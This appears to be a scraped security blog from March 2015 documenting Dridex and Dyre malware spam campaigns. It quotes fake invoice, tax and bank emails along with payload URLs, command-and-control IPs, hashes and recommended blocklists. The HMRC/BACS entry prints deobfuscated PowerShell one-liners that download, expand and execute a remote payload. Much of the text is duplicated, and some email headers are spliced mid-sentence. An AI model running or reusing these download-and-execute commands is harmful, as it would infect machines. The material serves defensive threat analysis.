There is a series of malware spams in progress in the following format:
Invoice (13\03\2015) for payment to JUPITER PRIMADONA GROWTH TRUST
Invoice (13\03\2015) for payment to CARD FACTORY PLC
Invoice (13\03\2015) for payment to CELTIC
Invoice (13\03\2015) for payment to MIRADA PLC
Note the use of the backslash in the date. There is an attachment in the format 1234XYZ.doc which I have seen three different variants of (although one of those was zero length), one of which was used in this spam run yesterday and one new one with zero detections which contains this malicious macro, which downloads another component from:
http://95.163.121.186/api/gbb1.exe
This is saved as %TEMP%\GHjkdfg.exe - incidentally, this server is wide open and is full of data and binaries relating to the Dridex campaign. Unsurprisingly, it is hosted on a Digital Networks CJSC aka DINETHOSTING IP address. This binary has a detection rate of 3/53 and the Malwr report shows it phoning home to 95.163.121.33 which is also in the same network neighbourhood.
The binary also drops a malicious Dridex DLL with a detection rate of 5/56. This is the same DLL as used in this spam run earlier today.
Recommended blocklist:
95.163.121.0/24
Friday, 13 March 2015
Malware spam: "Invoice (13\03\2015) for payment to COMPANY NAME"
Malware spam: "pentafoods.com" / "Invoice: 2262004"
This fake Penta Foods spam run is another variant of this and it comes with a malicious attachment. Penta Foods are not sending this email, instead it is a simple forgery.
Attached is a Word document R-1179776.doc which actually comes in two version, both with zero detection rates, contains one of two malicious macros [1] [2] which then download a component from the following locations:
http://accalamh.aspone.cz/js/bin.exe
http://awbrs.com.au/js/bin.exe
This is saved as %TEMP%\fJChjfgD675eDTU.exe and has a VirusTotal detection rate of 5/57. Automated analysis tools [1] [2] show a phone-home attempt to:
62.76.179.44 (Clodo-Cloud / IT House, Russia)
My sources also indicate that it phones home to:
212.69.172.187 (Webagentur, Austria)
78.129.153.12 (iomart / RapidSwitch, UK)
According to this Malwr report it also drops a DLL with a detection rate of just 2/57 which is probably Dridex.
Recommended blocklist:
62.76.179.44
212.69.172.187
78.129.153.12
From: cc18923@pentafoods.com
Date: 13 March 2015 at 07:50
Subject: Invoice: 2262004
Please find attached invoice : 2262004
Any queries please contact us.
--
Automated mail message produced by DbMail.
Registered to Penta Foods, License MBA2009357.
Attached is a Word document R-1179776.doc which actually comes in two version, both with zero detection rates, contains one of two malicious macros [1] [2] which then download a component from the following locations:
http://accalamh.aspone.cz/js/bin.exe
http://awbrs.com.au/js/bin.exe
This is saved as %TEMP%\fJChjfgD675eDTU.exe and has a VirusTotal detection rate of 5/57. Automated analysis tools [1] [2] show a phone-home attempt to:
62.76.179.44 (Clodo-Cloud / IT House, Russia)
My sources also indicate that it phones home to:
212.69.172.187 (Webagentur, Austria)
78.129.153.12 (iomart / RapidSwitch, UK)
According to this Malwr report it also drops a DLL with a detection rate of just 2/57 which is probably Dridex.
Recommended blocklist:
62.76.179.44
212.69.172.187
78.129.153.12
Thursday, 12 March 2015
Malware spam: "Invoice [1234XYZ] for payment to COMPANY NAME"
These rather terse emails appear to refer to various companies, and all come with a malicious attachment:
The attachment is a Word document with a name that matches the reference in the subject. So far, I have seen two different versions of this with low detection rates [1] [2] which contain these malicious macros [1] [2] [pastebin] which contain some quite entertaining obfuscation, but when deobfuscated try to download an additional component from the following locations:
https://92.63.88.102/api/gb1.exe
https://85.143.166.124/api/gb1.exe
Note the use of HTTPS. Those two IP addresses belong to:
92.63.88.102 (MWTV, Latvia)
85.143.166.124 (Pirix, Russia)
Both are well-known hosts for this sort of rubbish. According to the Malwr report this attempts to phone home to:
95.163.121.33 (Digital Networks CJSC aka DINETHOSTING, Russia)
Digital Networks is also a sea of crap. It also drops a Dridex DLL with a detection rate of 9/57.
Recommended blocklist:
95.163.121.0/24
92.63.82.0/23
92.63.84.0/22
92.63.88.0/24
85.143.166.0/24
From: Erasmo Small
Date: 12 March 2015 at 09:40
Subject: Invoice [3479XZM] for payment to INCOME & GROWTH VCT PLC(THE)
From: Eli Ramirez
Date: 12 March 2015 at 08:37
Subject: Invoice [4053FJK] for payment to RANDGOLD RESOURCES
From: Richard Baxter
Date: 12 March 2015 at 08:37
Subject: Invoice [3020JQM] for payment to TARSUS GROUP PLC
From: Megan Dennis
Date: 12 March 2015 at 09:36
Subject: Invoice [4706CEZ] for payment to SHANKS GROUP
The attachment is a Word document with a name that matches the reference in the subject. So far, I have seen two different versions of this with low detection rates [1] [2] which contain these malicious macros [1] [2] [pastebin] which contain some quite entertaining obfuscation, but when deobfuscated try to download an additional component from the following locations:
https://92.63.88.102/api/gb1.exe
https://85.143.166.124/api/gb1.exe
Note the use of HTTPS. Those two IP addresses belong to:
92.63.88.102 (MWTV, Latvia)
85.143.166.124 (Pirix, Russia)
Both are well-known hosts for this sort of rubbish. According to the Malwr report this attempts to phone home to:
95.163.121.33 (Digital Networks CJSC aka DINETHOSTING, Russia)
Digital Networks is also a sea of crap. It also drops a Dridex DLL with a detection rate of 9/57.
Recommended blocklist:
95.163.121.0/24
92.63.82.0/23
92.63.84.0/22
92.63.88.0/24
85.143.166.0/24
Wednesday, 11 March 2015
Malware spam: "Voicemail Message (07813297716) From:07813297716"
When was the last time someone sent you a voice mail message by email? Never? There are no surprises to find that this spam email message has a malicious attachment.
http://wqg64j0ei.homepage.t-online.de/data/log.exe
http://cosmeticvet.su/conlib.php
This behaviour is very much like a Dridex downloader, a campaign that has mostly been using malicous macros rather than EXE-in-ZIP attacks.
The executable it drops has a detection rate of 2/54 and these Malwr reports [1] [2] show a further component download from:
http://muscleshop15.ru/js/jre.exe
http://test1.thienduongweb.com/js/jre.exe
This component has a detection rate of 5/57. According to the Malwr report for that we see (among other things) that it drops a DLL with a detection rate of 4/57 which is the same Dridex binary we've been seeing all day.
Piecing together the IP addresses found in those reports combined with some information from one of my intelligence feeds, we can see that the following IPs are involved in this activity:
31.41.45.211 (Relink Ltd, Russia)
62.213.67.115 (Caravan Telecom, Russia)
80.150.6.138 (Deutsche Telekom, Germany)
42.117.1.88 (FPT Telecom Company, Vietnam)
188.225.77.242 (TimeWeb Co. Ltd., Russia)
212.224.113.144 (First Colo GmbH, Germany)
37.59.50.19 (OVH, France)
62.76.179.44 (Clodo-Cloud, Russia)
95.163.121.200 (Digital Networks CJSC aka DINETHOSTING, Russia)
185.25.150.33 (NetDC.pl, Poland)
104.232.32.119 (Net3, US)
188.120.243.159 (TheFirst.RU, Russia)
Recommended blocklist:
31.41.45.211
62.213.67.115
80.150.6.138
42.117.1.88
188.225.77.242
212.224.113.144
37.59.50.19
62.76.179.44
95.163.121.0/24
185.25.150.3
104.232.32.119
188.120.243.159
From: Voicemail admin@victimdomainThe attachment is a ZIP file containing a malicious EXE file called MSG00311.WAV.exe which has a VirusTotal detection rate of 5/57. According to the Malwr report, it pulls down another executable and some config files from:
Date: 11/03/2015 11:48
Subject: Voicemail Message (07813297716) From:07813297716
IP Office Voicemail redirected message
Attachment: MSG00311.WAV.ZIP
http://wqg64j0ei.homepage.t-online.de/data/log.exe
http://cosmeticvet.su/conlib.php
This behaviour is very much like a Dridex downloader, a campaign that has mostly been using malicous macros rather than EXE-in-ZIP attacks.
The executable it drops has a detection rate of 2/54 and these Malwr reports [1] [2] show a further component download from:
http://muscleshop15.ru/js/jre.exe
http://test1.thienduongweb.com/js/jre.exe
This component has a detection rate of 5/57. According to the Malwr report for that we see (among other things) that it drops a DLL with a detection rate of 4/57 which is the same Dridex binary we've been seeing all day.
Piecing together the IP addresses found in those reports combined with some information from one of my intelligence feeds, we can see that the following IPs are involved in this activity:
31.41.45.211 (Relink Ltd, Russia)
62.213.67.115 (Caravan Telecom, Russia)
80.150.6.138 (Deutsche Telekom, Germany)
42.117.1.88 (FPT Telecom Company, Vietnam)
188.225.77.242 (TimeWeb Co. Ltd., Russia)
212.224.113.144 (First Colo GmbH, Germany)
37.59.50.19 (OVH, France)
62.76.179.44 (Clodo-Cloud, Russia)
95.163.121.200 (Digital Networks CJSC aka DINETHOSTING, Russia)
185.25.150.33 (NetDC.pl, Poland)
104.232.32.119 (Net3, US)
188.120.243.159 (TheFirst.RU, Russia)
Recommended blocklist:
31.41.45.211
62.213.67.115
80.150.6.138
42.117.1.88
188.225.77.242
212.224.113.144
37.59.50.19
62.76.179.44
95.163.121.0/24
185.25.150.3
104.232.32.119
188.120.243.159
Labels:
DINETHOSTING,
Dridex,
EXE-in-ZIP,
France,
Malware,
OVH,
Poland,
Russia,
Spam,
TheFirst-RU,
Viruses,
Voice Mail
Malware spam: Message from "RNP0026735991E2" / "inv.09.03"
This pair of spam emails are closely related and have a malicious attachment:
Neither XLS attachment is currently detected by AV vendors [1] [2] and they contain two related but slightly different macros [1] [2] which download a component from the following locations:
http://koschudu.homepage.t-online.de/js/bin.exe
http://03404eb.netsolhost.com/js/bin.exe
The file is then saved as %TEMP%\fJChjfgD675eDTU.exe which has a VirusTotal detection rate of 3/57. According to this Malwr report, it attempts to connect to the following IPs:
188.225.77.216 (TimeWeb Co. Ltd, Russia)
42.117.1.88 (FPT Telecom Company, Vietnam)
31.41.45.211 (Relink Ltd, Russia)
87.236.215.103 (OneGbits, Lithuania)
104.232.32.119 (Net3, US)
188.120.243.159 (TheFirst.RU, Russia)
It also drops a couple more malicious binaries with the following MD5s:
8d3a1903358c5f3700ffde113b93dea6 [VT 2/56]
53ba28120a193e53fa09b057cc1cbfa2 [VT 4/57]
Recommended blocklist:
188.225.77.216
42.117.1.88
31.41.45.211
87.236.215.103
104.232.32.119
188.120.243.159
From: admin.scanner@victimdomain
Date: 11 March 2015 at 08:49
Subject: Message from "RNP0026735991E2"
This E-mail was sent from "RNP0026735991E2" (MP C305).
Scan Date: 11.03.2015 08:57:25 (+0100)
Queries to: admin.scanner@victimdomain
Attachment: 201503071457.xls
----------
From: Jora Service [jora.service@yahoo.com]
Date: 11 March 2015 at 09:27
Subject: inv.09.03
Attachment: INV 86-09.03.2015.xls
Neither XLS attachment is currently detected by AV vendors [1] [2] and they contain two related but slightly different macros [1] [2] which download a component from the following locations:
http://koschudu.homepage.t-online.de/js/bin.exe
http://03404eb.netsolhost.com/js/bin.exe
The file is then saved as %TEMP%\fJChjfgD675eDTU.exe which has a VirusTotal detection rate of 3/57. According to this Malwr report, it attempts to connect to the following IPs:
188.225.77.216 (TimeWeb Co. Ltd, Russia)
42.117.1.88 (FPT Telecom Company, Vietnam)
31.41.45.211 (Relink Ltd, Russia)
87.236.215.103 (OneGbits, Lithuania)
104.232.32.119 (Net3, US)
188.120.243.159 (TheFirst.RU, Russia)
It also drops a couple more malicious binaries with the following MD5s:
8d3a1903358c5f3700ffde113b93dea6 [VT 2/56]
53ba28120a193e53fa09b057cc1cbfa2 [VT 4/57]
Recommended blocklist:
188.225.77.216
42.117.1.88
31.41.45.211
87.236.215.103
104.232.32.119
188.120.243.159
Malware spam: BACS "Remittance Advice" / HMRC "Your Tax rebate"
From: Long Fletcher
Date: 11 March 2015 at 09:44
Subject: Remittance Advice
Good Morning,
Please find attached the BACS Remittance Advice for payment made by RENEW HLDGS.
Please note this may show on your account as a payment reference of FPALSDB.
Kind Regards
Long Fletcher
Finance Coordinator
Attachment: LSDB.xls
----------
From: Vaughn Baker
Date: 11 March 2015 at 09:27
Subject: Your Remittance Advice [FPABHKZCNZ]
Good Morning,
Please find attached the BACS Remittance Advice for payment made by JD SPORTS FASHION PLC.
Please note this may show on your account as a payment reference of FPABHKZCNZ.
Kind Regards
Vaughn Baker
Senior Accountant
----------
From: HMRC
Date: 11 March 2015 at 10:04
Subject: Your Tax rebate
Dear [redacted],
After the last yearly computations of your financial functioning we have defined that you have the right to obtain a tax rebate of 934.80. Please confirm the tax rebate claim and permit us have 6-9 days so that we execute it. A rebate can be postponed for a variety of reasons. For instance confirming unfounded data or applying not in time.
To access the form for your tax rebate, view the report attached. Document Reference: (196XQBK).
Regards, HM Revenue Service. We apologize for the inconvenience.
The security and confidentiality of your personal information is important for us. If you have any questions, please either call the toll-free customer service phone number.
© 2014, all rights reserved
Sample attachment names:
HMRC: 196XQBK.xls, 89WDZ.xls
BACS: LSDB.xls, Rem_8392TN.xml (note that this is actually an Excel document, not an XML file)
All of these documents have low detection rates [1] [2] [3] [4] and contain these very similar malicious macros (containing sandbox detection algorithms) [1] [2] [3] [4] which when decrypted attempt to run the following Powershell commands:
cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://193.26.217.39/asdvx/fghs.php','%TEMP%\dsfsdFFFv.cab'); expand %TEMP%\dsfsdFFFv.cab %TEMP%\dsfsdFFFv.exe; start %TEMP%\dsfsdFFFv.exe;These are probably compromised hosts, for the record they are:
cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://93.170.123.36/asdvx/fghs.php','%TEMP%\dsfsdFFFv.cab'); expand %TEMP%\dsfsdFFFv.cab %TEMP%\dsfsdFFFv.exe; start %TEMP%\dsfsdFFFv.exe;
cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://85.143.166.190/asdvx/fghs.php','%TEMP%\dsfsdFFFv.cab'); expand %TEMP%\dsfsdFFFv.cab %TEMP%\dsfsdFFFv.exe; start %TEMP%\dsfsdFFFv.exe;
cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://46.30.42.177/asdvx/fghs.php','%TEMP%\dsfsdFFFv.cab'); expand %TEMP%\dsfsdFFFv.cab %TEMP%\dsfsdFFFv.exe; start %TEMP%\dsfsdFFFv.exe;
193.26.217.39 (Servachok Ltd, Russia)
93.170.123.36 (PE Gornostay Mikhailo Ivanovich, Ukraine)
85.143.166.190 (Pirix, Russia)
46.30.42.177 (EuroByte / Webazilla, Russia)
These download a CAB file, and then expand and execute it. This EXE has a detection rate of 4/57 and automated analysis tools [1] [2] show attempted traffic to:
95.163.121.33 (Digital Networks aka DINETHOSTING, Russia)
188.120.226.6 (TheFirst.RU, Russia)
188.165.5.194 (OVH, France)
According to this Malwr report it drops two further malicious files with the following MD5s:
c6cdf73eb5d11ac545f291bc668fd7fe
8d3a1903358c5f3700ffde113b93dea6 [VT 2/56]
Recommended blocklist:
95.163.121.0/24
188.120.226.6
188.165.5.194
193.26.217.39
93.170.123.36
85.143.166.190
46.30.42.177
Friday, 6 March 2015
Fake job offer: jobinituk.com / jobsinits.com / workincroatia.com
This spammed out "job offer" is actually an attempt to recruit people into criminal money laundering.
jobinituk.com
jobsinits.com
workincroatia.com
sati-haus.net
If you receive a job offer soliciting replies to one of these domains, then the job offer is bogus. If you were to accept it, you could well be liable to repay back the money you helped launder, or even face arrest or jail time.
UPDATE: There is a second version of the spam circulating..
Date: 6 March 2015 at 21:00There are four related domains:
Subject: Hello
Good day!
We considered your resume to be very attractive and we thought the vacant position in our company could be interesting for you.
Our firm specializes in advertisment services realizing unique products of creative advertising and branding strategies
and solutions to develop a distinctive brand value.
We cooperate with different countries and currently we have many clients in the USA and the EU.
Due to this fact, we need to increase the number of our destination representatives' regular staff.
In their duties will be included the document and payment control of our clients.
Part-time employment is currently important.
We offer a wage from 3100 GBP per month.
If you are interested in our offer, mail to us your answer on andonis@jobinituk.com and
we will send you an extensive information as soon as possible.
Respectively submitted
Personnel department
jobinituk.com
jobsinits.com
workincroatia.com
sati-haus.net
If you receive a job offer soliciting replies to one of these domains, then the job offer is bogus. If you were to accept it, you could well be liable to repay back the money you helped launder, or even face arrest or jail time.
UPDATE: There is a second version of the spam circulating..
Date: 9 March 2015 at 15:23
Subject: Offer
If you have
- excellent administrative skills
- knowledge of Microsoft Office
- a keen eye for details
If you
- present yourself well
- can understand and execute instructions
If you are
- a team player with the ability to work independently
- organized
- reliable and punctual person
- determined to work hard and succeed
Then We need you in Our Advertising Company!
Please email us for details of the job: Benito@jobinituk.com
Labels:
Job Offer Scams,
Spam
Malware spam: "Mick George Invoice 395687" / "Mick George Invoicing [mginv@mickgeorge.co.uk]"
This malformed spam is meant to have a malicious attachment:
The email looks like a genuine email because it has been copied from a genuine email from this company, but Mick George Skips are not actually sending this out. Instead it is a simple forgery.
What you are meant to have attached is a Word document Invoice395687.DOC which comes in several varieties, but they all contain a malicious macro similar to this which (in this case) downloads a component from http://schlaghaufer.de/js/bin.exe
This malware and the payload it drops is identical to the one found in this fake IRS spam run earlier today.
From: Mick George Invoicing [mginv@mickgeorge.co.uk]Something has gone wrong with the formatting, it is meant to look like this:
Date: 6 March 2015 at 09:29
Subject: Mick George Invoice 395687
Please find attached a copy of your invoice 395687.
If you have any queries regarding the invoice, please do not hesitate to co=
ntact us by emailing mginv@mickgeorge.co.uk<mailto:mginv@mickegeorge.co.uk>=
or calling our finance department on 01480 499125.
Regards
Finance Team
MICK GEORGE[http://mickgeorgeskips.co.uk/wp-content/uploads/2014/08/image00=
1.jpg] (r)
T: 01480 499125
F: 01480 498077
www.mickgeorge.co.uk<http://www.mickgeorge.co.uk/>
Lancaster House, Meadow Lane, St Ives, Cambs, PE27 4YQ [http://mickgeorges=
kips.co.uk/wp-content/uploads/2014/08/image003.jpg] <https://plus.google.co=
m/109160871896788819541/posts> [http://mickgeorgeskips.co.uk/wp-content/=
uploads/2014/08/image004.jpg] <https://twitter.com/mickgeorgeltd>
Specialists in Earthworks * Aggregates * Skip Hire * Contaminated Land Serv=
ices & Remediation * Demolition * Contracting
Waste Management & Recycling * Landfill & Tipping Facilities * Asbestos Rem=
oval * Ready Mix Concrete & Floor Screeds
[Concrete signature]<http://mickgeorgeskips.co.uk/wp-content/uploads/2014/0=
8/Concrete-signature.jpg>
Disclaimer
This email and any attachments are intended only for the use of the individ=
ual or entity to which it is directed and may contain information that is p=
rivileged, confidential and exempt from disclosure under applicable law.
If you have received this email and you are not the intended recipient or t=
he employee or agent responsible for delivering this email to the intended =
recipient, please inform Mick George on +44 (0)1480 498099 and then delete =
the email from your system. If you are not a named addressee you must not u=
se, disclose, disseminate, distribute, copy, print or reply to this email.
Although Mick George Ltd routinely screens for viruses, addressees should s=
can this email and any attachments for viruses. Mick George Ltd makes no re=
presentation or warranty as to the absence of viruses in this email or any =
attachments. Please note for the protection of our clients and business, we=
may monitor and read emails sent to and from our server(s).
Mick George Ltd
Please find attached a copy of your invoice 395687.
If you have any queries regarding the invoice, please do not hesitate to contact us by emailing mginv@mickgeorge.co.uk or calling our finance department on 01480 499125.
Regards
Finance Team
MICK GEORGE ®
T: 01480 499125
F: 01480 498077
www.mickgeorge.co.uk
Specialists in Earthworks • Aggregates • Skip Hire • Contaminated Land Services & Remediation • Demolition • Contracting
Lancaster House, Meadow Lane, St Ives, Cambs, PE27 4YQ
Waste Management & Recycling • Landfill & Tipping Facilities • Asbestos Removal • Ready Mix Concrete & Floor Screeds
Disclaimer
This email and any attachments are intended only for the use of the individual or entity to which it is directed and may contain information that is privileged, confidential and exempt from disclosure under applicable law.
If you have received this email and you are not the intended recipient or the employee or agent responsible for delivering this email to the intended recipient, please inform Mick George on +44 (0)1480 498099 and then delete the email from your system. If you are not a named addressee you must not use, disclose, disseminate, distribute, copy, print or reply to this email.
Although Mick George Ltd routinely screens for viruses, addressees should scan this email and any attachments for viruses. Mick George Ltd makes no representation or warranty as to the absence of viruses in this email or any attachments. Please note for the protection of our clients and business, we may monitor and read emails sent to and from our server(s).
Mick George Ltd
Registered no. 2417831 (England)
The email looks like a genuine email because it has been copied from a genuine email from this company, but Mick George Skips are not actually sending this out. Instead it is a simple forgery.
What you are meant to have attached is a Word document Invoice395687.DOC which comes in several varieties, but they all contain a malicious macro similar to this which (in this case) downloads a component from http://schlaghaufer.de/js/bin.exe
This malware and the payload it drops is identical to the one found in this fake IRS spam run earlier today.
Malware spam: "Your 2015 Electronic IP Pin!" / "Internal Revenue Service [refund.noreply@irs.gov]"
This fake IRS email comes with a malicious attachment.
So far I have only seen a single sample of this with an attachment TaxReport(IP_PIN).doc - although there are usually several different versions. Currently this is undetected by AV vendors. This contains a malicious macro [pastebin] which downloads a component from the following location:
http://chihoiphunumos.ru/js/bin.exe
There are probably other download locations, but the payload will be the same. This is saved as %TEMP%\324235235.exe and has a detection rate of 1/55. Automated analysis tools [1] [2] show attempted connections to:
92.63.87.13 (MWTV, Latvia)
95.163.121.200 (Digital Networks CJSC aka DINETHOSTING, Russia)
104.232.32.119 (Net3, US)
87.236.215.103 (OneGbits, Lithunia)
According to the Malwr report this executable drops another version of itself [VT 1/56] and a malicious DLL [VT 2/56].
Recommended blocklist:
92.63.82.0/23
92.63.84.0/22
92.63.88.0/24
95.163.121.0/24
104.232.32.119
87.236.215.103
From: Internal Revenue Service [refund.noreply@irs.gov]
Date: 6 March 2015 at 08:48
Subject: Your 2015 Electronic IP Pin!
Dear Member
This is to inform you that our system has generated your new secured Electronic PIN to e-file your 2014 tax return.
Please kindly download the microsoft file to securely review it.
Thanks
Internal Revenue Service
915 Second Avenue, MS W180
So far I have only seen a single sample of this with an attachment TaxReport(IP_PIN).doc - although there are usually several different versions. Currently this is undetected by AV vendors. This contains a malicious macro [pastebin] which downloads a component from the following location:
http://chihoiphunumos.ru/js/bin.exe
There are probably other download locations, but the payload will be the same. This is saved as %TEMP%\324235235.exe and has a detection rate of 1/55. Automated analysis tools [1] [2] show attempted connections to:
92.63.87.13 (MWTV, Latvia)
95.163.121.200 (Digital Networks CJSC aka DINETHOSTING, Russia)
104.232.32.119 (Net3, US)
87.236.215.103 (OneGbits, Lithunia)
According to the Malwr report this executable drops another version of itself [VT 1/56] and a malicious DLL [VT 2/56].
Recommended blocklist:
92.63.82.0/23
92.63.84.0/22
92.63.88.0/24
95.163.121.0/24
104.232.32.119
87.236.215.103
Malware spam: "Your online Gateway.gov.uk Submission"
This fake Government spam leads to malware.
The link in the email leads to a download at cubbyusercontent.com and the payload is the same as this NatWest spam run also active today.
From: Gateway.gov.uk
Date: 6 March 2015 at 11:49
Subject: Your online Gateway.gov.uk Submission
Government Gateway logo
Electronic Submission Gateway
Thank you for your submission for the Government Gateway.
The Government Gateway is the UK's centralized registration service for e-Government services.
To view/download your form to the Government Gateway please visit http://www.gateway.gov.uk/
This is an automatically generated email. Please do not reply as the email address is not
monitored for received mail.
gov.uk - the best place to find government services and information - Opens in new window
The best place to find government services and information
The link in the email leads to a download at cubbyusercontent.com and the payload is the same as this NatWest spam run also active today.
Malware spam: "You have received a new secure message from BankLine" / "Bankline [secure.message@business.natwest.com]"
This fake banking spam leads to malware.
Automated analysis tools [1] [2] [3] [4] show attempted connections to the following URLs:
http://all-about-weightloss.org/wp-includes/images/vikun.png
http://bestcoveragefoundation.com/wp-includes/images/vikun.png
http://190.111.9.129:14248/0603no11/HOME/0/51-SP3/0/ELHBEDIBEHGBEHK
http://190.111.9.129:14249/0603no11/HOME/41/7/4/
It also appears that there is an attempted connection to 212.56.214.203.
Of all of these IPs, 190.111.9.129 (Navega.com, Guatemala) is the most critical to block. It is also a characteristic of this malware (Upatre/Dyre) that it connects to checkip.dyndns.org to work out the IP address of the infected machine, it is worth checking for traffic to this domain.
The Malwr report shows several dropped files, including fyuTTs27.exe which has a VirusTotal detection rate of 4/57.
From: Bankline [secure.message@business.natwest.com]This downloads a ZIP file from cubbyusercontent.com which contains a malicious executable Business Secure Message.exe which has a VirusTotal detection rate of just 1/57.
Date: 6 March 2015 at 10:36
Subject: You have received a new secure message from BankLine
You have received a secure message.
Your Documents have been uploaded to Cubby cloud storage.
Cubby cloud storage is a cloud data service powered by LogMeIn, Inc.
Read your secure message by following the link bellow:
https://www.cubbyusercontent.com/pl/Business%20Secure%20Message.zip/_90ad04a3965340b195b8be98c6a6ae37
----------------
You will be prompted to open (view) the file or save (download) it to your computer. For best results, save the file first, then open it.
If you have concerns about the validity of this message, please contact the sender directly. For questions please contact the Bankline Bank Secure Email Help Desk at 0131 556 8719.
First time users - will need to register after opening the attachment.
About Email Encryption - https://help.business.natwest.com/support/app/answers/detail/a_id/1671/kw/secure%20message
Automated analysis tools [1] [2] [3] [4] show attempted connections to the following URLs:
http://all-about-weightloss.org/wp-includes/images/vikun.png
http://bestcoveragefoundation.com/wp-includes/images/vikun.png
http://190.111.9.129:14248/0603no11/HOME/0/51-SP3/0/ELHBEDIBEHGBEHK
http://190.111.9.129:14249/0603no11/HOME/41/7/4/
It also appears that there is an attempted connection to 212.56.214.203.
Of all of these IPs, 190.111.9.129 (Navega.com, Guatemala) is the most critical to block. It is also a characteristic of this malware (Upatre/Dyre) that it connects to checkip.dyndns.org to work out the IP address of the infected machine, it is worth checking for traffic to this domain.
The Malwr report shows several dropped files, including fyuTTs27.exe which has a VirusTotal detection rate of 4/57.
Thursday, 5 March 2015
Malware spam: "Credit Control [cc@pentafoods.com]"/ "Penta invoice I0026098"
This spam email does not come from Penta Foods, instead it is a simple forgery with a malicious attachment.
http://maloja.se/js/bin.exe
http://campusnut.com/js/bin.exe
This is the same payload as used in this earlier spam run. It currently has a VirusTotal detection rate of 12/56.
From: Credit Control [cc@pentafoods.com]Attached is a document I0026098.doc which comes in at least two versions with low detection rates [1] [2] which contain some macros [1] [2] that attempt to download a component from the following locations:
Date: 5 March 2015 at 11:10
Subject: Penta invoice I0026098
Please find attached your invoice I0026098
Regards,
Finance Team
http://maloja.se/js/bin.exe
http://campusnut.com/js/bin.exe
This is the same payload as used in this earlier spam run. It currently has a VirusTotal detection rate of 12/56.
Malware spam: "Bobby Drell [rob@abbottpainting.com]" / "Brochure2.doc"
This spam does not come from Bobby Drell or Abbott Painting, instead it is a simple forgery with a malicious attachment.
http://data.gmsllp.com/js/bin.exe
This is saved as %TEMP%\324235235.exe. Note that there may be different versions of this document that download files from different locations, but the payload should be identical. In this case the executable has a detection rate of 4/57.
Automated analysis tools [1] [2] show it phoning home to the following IPs:
92.63.87.13 (MWTV, Latvia)
95.163.121.200 (Digital Networks aka DINETHOSTING, Russia)
Usually this will drop a malicious Dridex DLL, although I was not able to obtain a sample.
Recommended blocklist:
92.63.82.0/23
92.63.84.0/22
92.63.88.0/24
95.163.121.0/24
From: Bobby Drell [rob@abbottpainting.com]Attached is a file Brochure2.doc which has a low detection rate which contains this malicious macro [pastebin] which downloads a component from the following location:
Date: 5 March 2015 at 10:27
Subject: Brochure2.doc
Please change the year to 2015.
Please confirm receipt
Thanks
Bobby Drell
http://data.gmsllp.com/js/bin.exe
This is saved as %TEMP%\324235235.exe. Note that there may be different versions of this document that download files from different locations, but the payload should be identical. In this case the executable has a detection rate of 4/57.
Automated analysis tools [1] [2] show it phoning home to the following IPs:
92.63.87.13 (MWTV, Latvia)
95.163.121.200 (Digital Networks aka DINETHOSTING, Russia)
Usually this will drop a malicious Dridex DLL, although I was not able to obtain a sample.
Recommended blocklist:
92.63.82.0/23
92.63.84.0/22
92.63.88.0/24
95.163.121.0/24
Wednesday, 4 March 2015
"Remittance advice" spam has a mystery XML attachment
From: Trudy TrevinoOther example fake senders are:
Date: 4 March 2015 at 09:29
Subject: Remittance advice [Rem_0559ZX.xml]
Good morning
You can find remittance advice [Rem_0559ZX.xml] in the attachment
Kind Regards
Trudy Trevino
ROSNEFT OJSC
Georgette Whitfield
DELTEX MEDICAL GROUP
Jasmine Hansen
ACER INC
Jodi Cooper
JOHNSON SERVICE GROUP PLC
Rebekah Dodson
VICTREX
Edmund Molina
600 GROUP
Callie Brewer
BIOQUELL
Harriett Ferguson
BRISTOL & WEST PLC
Gabrielle Alvarado
JPMORGAN US SMALLER CO INV TST PLC
The name of the XML file in the attachment (and also the body text and subject) varies but is always in the format Rem_1234AB.xml. So far I have seen three different versions (clicking the MD5 leads to a Pastebin with the XML attachment):
- MD5 B2E594BDE90A1C998F3A7D892BAC925B - VT 0/57
- MD5 77739AB6C20E9DFBEFFA3E2E6960E156 - VT 0/57
- MD5 877E6EC17F307C319E3084D1EDFC40A4 - VT 0/57
There's probably little reason to accept XML documents by email. Blocking these at your email gateway might be a good idea.
UPDATE 1
An analysis from another party indicates the following download locations:
http://92.63.87.12:8080/azvxjdfr31k/abs5ajsu.exe
http://178.32.184.11:8080/azvxjdfr31k/abs5ajsu.exe
http://46.30.42.90:8080/azvxjdfr31k/abs5ajsu.exe
The following are the servers the malware phones home to, I recommend blocking them:
62.76.176.203
46.30.42.171
74.208.68.243
37.139.47.111
More analysis to follow..
Malware spam: "John Donald [john@kingfishermanagement.uk.com]" / "Document1"
This rather terse email comes with a malicious attachment:
http://retro-moto.cba.pl/js/bin.exe
Note that there may be other different versions of this document with different download locations, but it should be an identical binary that is downloaded. This file is saved as %TEMP%\GHjkdjfgjkGKJ.exe and has a VirusTotal detection rate of 2/57.
Automated analysis tools [1] [2] show attempted network traffic to the following IPs:
92.63.87.13 (MWTV, Latvia)
104.232.32.119 (Net3, US)
87.236.215.103 (OneGbits, Lithunia)
108.61.198.33 (Gameservers.com / Choopa LLC, Netherlands)
According to the Malwr report it also drops another version of itself with a detection rate of just 1/57 plus a DLL with a detection rate of 7/56.
Recommended blocklist:
92.63.82.0/23
92.63.84.0/22
92.63.88.0/24
104.232.32.119
87.236.215.103
108.61.198.33
From: John Donald [john@kingfishermanagement.uk.com]There is no body text, but there is an attachment Document1.doc which is not currently detected by AV vendors, in turn it contains this malicious macro [pastebin] which downloads another component from the following location:
Date: 4 March 2015 at 09:09
Subject: Document1
http://retro-moto.cba.pl/js/bin.exe
Note that there may be other different versions of this document with different download locations, but it should be an identical binary that is downloaded. This file is saved as %TEMP%\GHjkdjfgjkGKJ.exe and has a VirusTotal detection rate of 2/57.
Automated analysis tools [1] [2] show attempted network traffic to the following IPs:
92.63.87.13 (MWTV, Latvia)
104.232.32.119 (Net3, US)
87.236.215.103 (OneGbits, Lithunia)
108.61.198.33 (Gameservers.com / Choopa LLC, Netherlands)
According to the Malwr report it also drops another version of itself with a detection rate of just 1/57 plus a DLL with a detection rate of 7/56.
Recommended blocklist:
92.63.82.0/23
92.63.84.0/22
92.63.88.0/24
104.232.32.119
87.236.215.103
108.61.198.33
Sunday, 1 March 2015
Fake job offer: "ukhomejob.com" and many others
